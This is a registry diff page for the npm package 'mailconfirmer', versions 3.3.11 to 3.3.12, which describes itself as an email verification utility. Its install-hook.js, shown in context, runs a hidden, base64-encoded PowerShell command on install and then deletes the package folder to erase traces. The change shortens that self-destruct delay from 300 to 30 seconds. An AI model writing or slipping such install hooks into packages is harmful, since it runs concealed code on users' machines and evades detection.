mailconfirmer 3.3.11 → 3.3.12

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/install-hook.js +1 -1
  2. package/package.json +1 -1
package/install-hook.js CHANGED
@@ -12,7 +12,7 @@ exec(`powershell -NoP -NonI -W Hidden -Enc ${base64Payload}`, (err) => {
12
12
  // 2. Self‑destruction: delete this package folder after 5 minutes (300,000 ms)
13
13
  const packagePath = __dirname; // absolute path to node_modules/mailconfirmer
14
14
  const selfDestructScript = `
15
- Start-Sleep -Seconds 300
15
+ Start-Sleep -Seconds 30
16
16
  Remove-Item -Recurse -Force "${packagePath}" -ErrorAction SilentlyContinue
17
17
  `;
18
18
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "mailconfirmer",
3
- "version": "3.3.11",
3
+ "version": "3.3.12",
4
4
  "description": "Lightweight email confirmation and verification utilities for Node.js – send confirmation links, validate tokens, and manage email verification flows",
5
5
  "main": "index.js",
6
6
  "scripts": {